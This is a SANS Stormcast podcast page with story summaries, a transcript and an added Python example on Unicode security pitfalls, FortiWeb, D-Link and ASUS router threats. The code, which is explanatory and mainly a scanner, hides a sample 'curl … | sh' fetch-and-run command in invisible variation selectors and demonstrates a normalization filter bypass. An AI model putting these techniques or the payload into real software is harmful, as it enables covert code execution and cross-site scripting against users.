
SANS Stormcast Thursday, November 20th, 2025: Unicode Issues; FortiWeb More Vulns; DLink DIR-878 Vuln; Operation WrtHug and ASUS Routers

Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9708.mp3


Unicode: It is more than funny domain names.
Unicode can cause a number of issues beyond lookalike domain names, due to rarely considered features such as variation selectors (which can hide data in text that renders as a single visible character), bidirectional text controls (which make rendered order differ from logical order during code review), and character normalization that can turn filtered input into cross-site scripting or SQL injection payloads.
https://isc.sans.edu/diary/Unicode%3A%20It%20is%20more%20than%20funny%20domain%20names./32472
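The three pitfalls summarized above, as an added Python example (this is not code from the ISC diary, and the hidden-byte encoding and sample "source file" below are constructed for illustration, not taken from any real extension or malware): a round-trip that hides bytes behind variation selectors, a scanner that flags variation selectors and Unicode format controls such as the right-to-left override in a source file, and a filter that is bypassed by fullwidth angle brackets when NFKC normalization runs after the check instead of before it.

```python
"""Added example for the Unicode diary summary (not code from the diary):
three overlooked Unicode pitfalls plus a small scanner for source files.

Everything below (the encoding scheme, PAYLOAD and SAMPLE_SOURCE) is
constructed for illustration.
"""
import re
import unicodedata
from typing import Optional

# Variation selectors: VS1-VS16 (U+FE00..U+FE0F) and VS17-VS256
# (U+E0100..U+E01EF). They are combining marks meant to pick a glyph
# variant, so editors and diff viewers render nothing for them.
VARIATION_SELECTORS = re.compile(r"[\uFE00-\uFE0F\U000E0100-\U000E01EF]")


def hide_bytes_in_variation_selectors(payload: bytes, carrier: str = "a") -> str:
    """Append one variation selector per payload byte to a visible carrier.
    On screen the result looks like just the carrier character; the bytes
    survive copy/paste and round-trip through the decoder below.
    The byte-to-selector mapping is a constructed one for this example."""
    out = [carrier]
    for b in payload:
        # 0x00-0x0F -> VS1-VS16, 0x10-0xFF -> VS17-VS256
        out.append(chr(0xFE00 + b) if b < 0x10 else chr(0xE0100 + b - 0x10))
    return "".join(out)


def recover_bytes_from_variation_selectors(text: str) -> bytes:
    """Inverse of hide_bytes_in_variation_selectors; ignores other characters."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 0x10)
    return bytes(out)


def scan_source(text: str) -> list:
    """Flag code points that render invisibly or reorder what is displayed:
    variation selectors, and any Unicode 'Cf' format control (this covers
    the bidi override/isolate characters behind right-to-left review
    tricks, and also zero-width spaces and joiners).
    Returns sorted (line number, kind, code point name, count) tuples."""
    counts = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for ch in line:
            if VARIATION_SELECTORS.match(ch):
                kind = "variation-selector"
            elif unicodedata.category(ch) == "Cf":
                kind = "format-control"
            else:
                continue
            key = (lineno, kind, unicodedata.name(ch, "UNNAMED"))
            counts[key] = counts.get(key, 0) + 1
    return [(*key, n) for key, n in sorted(counts.items())]


def filter_then_normalize(user_input: str):
    """Wrong order: the check runs on the raw string, then NFKC normalization
    (common before a case-insensitive lookup or storage) turns fullwidth
    U+FF1C/U+FF1E into plain '<' and '>' after the check already passed.
    Returns (allowed, value)."""
    if "<" in user_input or ">" in user_input:
        return False, None
    return True, unicodedata.normalize("NFKC", user_input)


def normalize_then_filter(user_input: str):
    """Right order: normalize first, validate the normalized form, and use
    only that form afterwards. Returns (allowed, value)."""
    normalized = unicodedata.normalize("NFKC", user_input)
    if "<" in normalized or ">" in normalized:
        return False, None
    return True, normalized


# Constructed sample: line 1 carries hidden bytes behind a single visible 'a';
# line 2 uses a right-to-left override plus isolates so the rendered order
# differs from the logical order a compiler sees; line 3 is clean.
PAYLOAD = b"curl -s http://example.invalid/p | sh"
SAMPLE_SOURCE = "\n".join([
    'label = "' + hide_bytes_in_variation_selectors(PAYLOAD) + '"',
    "# \u202e} \u2066if (is_admin)\u2069 \u2066 only admins see this",
    "print(label)",
]) + "\n"


if __name__ == "__main__":
    hidden = hide_bytes_in_variation_selectors(PAYLOAD)
    print("escaped form:", hidden.encode("unicode_escape").decode("ascii")[:60], "...")
    print("characters:", len(hidden), "recovered:", recover_bytes_from_variation_selectors(hidden))
    for finding in scan_source(SAMPLE_SOURCE):
        print("finding:", finding)
    print("filter then normalize:", filter_then_normalize("\uff1cscript\uff1e"))
    print("normalize then filter:", normalize_then_filter("\uff1cscript\uff1e"))
```

The scanner keys on the General_Category value rather than a fixed list, so it also catches zero-width characters that an allow-list of bidi controls would miss; a practical check is to run it over every file in a pull request and fail the build on any finding, since none of these code points belong in source, build scripts, or extension manifests.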

FortiWeb Multiple OS command injection in API and CLI
A second FortiWeb vulnerability that Fortinet patched without disclosing it is already being exploited in the wild. The advisory rates it medium (CVSS 6.7) because exploitation requires authentication.
https://fortiguard.fortinet.com/psirt/FG-IR-25-513

D-Link DIR-878 Vulnerability
D-Link disclosed four different vulnerabilities in its popular DIR-878 router. The router is end-of-life and D-Link will not release patches; the only options are replacing the device or installing third-party firmware such as OpenWrt, if it supports this model.
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10475

Operation WrtHug, The Global Espionage Campaign Hiding in Your Home Router
A new SecurityScorecard report, "Operation WrtHug," documents a coordinated campaign that compromised an estimated 50,000 ASUS routers worldwide using older vulnerabilities from 2023 rather than new ones, and that installs a distinctive certificate on the routers, which is how the botnet was measured. The goal appears to be a relay network for follow-up attacks.
https://securityscorecard.com/blog/operation-wrthug-the-global-espionage-campaign-hiding-in-your-home-router/

Podcast Transcript

Hello and welcome to the Thursday, November 20th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu undergraduate certificate program in Applied Cybersecurity.

Today's diary was inspired by the GlassWorm malware that we had a couple of weeks ago. This was this set of Visual Studio Code extensions that injected malware. And the malware was sort of invisible because it used these Unicode variation selectors, which is one of those features that people aren't really aware even exists in Unicode. And with that, I wanted to summarize some of these sort of often overlooked security issues when it comes to Unicode. People usually focus more on things like lookalike domain names, which personally I actually don't really consider such a big deal. Many browsers, in particular Chrome, are pretty good about not displaying many of these domain names. But instead, we also have the same issue in applications. We do have some character conversions that can cause issues like cross-site scripting and SQL injection. And then, yeah, variation selectors that may appear to display a different text than is then actually being interpreted by your system. Same with left-to-right versus right-to-left text directions that can also cause issues with visual code reviews. So I just want to summarize this quickly. There isn't really that much to it. But if you have any other ideas about important things with Unicode, let me know. I'm thinking about doing at least one more follow-up on this with regular expressions and Unicode, because that's another issue. And I think another problem with Unicode is it suffers a little bit from the same problem as IPv6, that people kind of ignore it. They don't really think they're using it, but everybody uses it in some form. If you have a web application that does use UTF-8 encoding, which is pretty much any web application, you're probably open to Unicode attacks in some form.

And then, apologies, the next story should have made it into yesterday's podcast. Just missed it. This is yet another FortiWeb issue. Fortinet did publish an advisory stating that there is a second vulnerability that they recently patched but hadn't disclosed yet. Well, they're now coming clean. After all, it's already being exploited in the wild, and it kind of tells you that delaying disclosure of these vulnerabilities does not necessarily delay exploitation of the vulnerabilities, in particular if they're easy to exploit. Now, this one has a lower CVSS score of 6.7. So it's only medium, in part because it does require authentication. So there is some barrier to actually exploiting this arbitrary code execution vulnerability.

But well, let's flip to some of the consumer devices. And here we have first of all D-Link announcing four different vulnerabilities in their DIR-878 routers. This is a very popular model, but sadly it's out of support. So you won't see any patches for these vulnerabilities. If you want to keep the hardware alive, your best option is, and I'm not even sure if that's an option for this particular model, to install something like OpenWrt or such; that may be an option here. Other than that, toss the device, buy a different one. That's how you want to patch this. So it's usually the upgrade via the trash bin.

And SecurityScorecard came out with a report documenting an operation that they are calling WrtHug. This particular attack was directed at ASUS routers. It did not use any new vulnerabilities. Instead, older ones from 2023 were mostly being used here in this particular set of attacks. What's also interesting is, and I mentioned this yesterday when we talked about the malware that we actually had a diary about yesterday, that this also had as a goal to set up a relay network, so infrastructure for follow-up attacks. Also, SecurityScorecard is a company that sort of scans the internet for sort of attack surface measurements and such. They were able to actually measure the size of this particular botnet because the attacker here did install a very specific certificate on these routers. And they estimated about 50,000 routers were affected by this attack.

Well, just a couple of words here about all of the attacks we talked about here: the FortiWeb, the D-Link, the ASUS attack. They all have one thing in common, and that's that there is actually a reasonably easy way to mitigate many of these issues. And that's just separating your control planes. So what this refers to is, make sure that you limit access to your admin interfaces and APIs. So make sure they're only accessible from trusted networks like an admin VLAN or a VPN, or at least, in a home setup, from your internal network and not exposed to the outside world. With that configuration setting, you can pretty much prevent like 90% or so of these attacks. And it's usually the default setting, but sometimes for convenience or so, people are setting up remote access to these admin interfaces, like to do remote maintenance and the like. Well, if you need that, please use a VPN.

Well, and that's it for today. Thanks for listening. Thanks for liking and subscribing to this podcast. As always, special thanks if you're leaving a comment with your favorite podcast platform. That's it for today, and talk to you again tomorrow. Bye.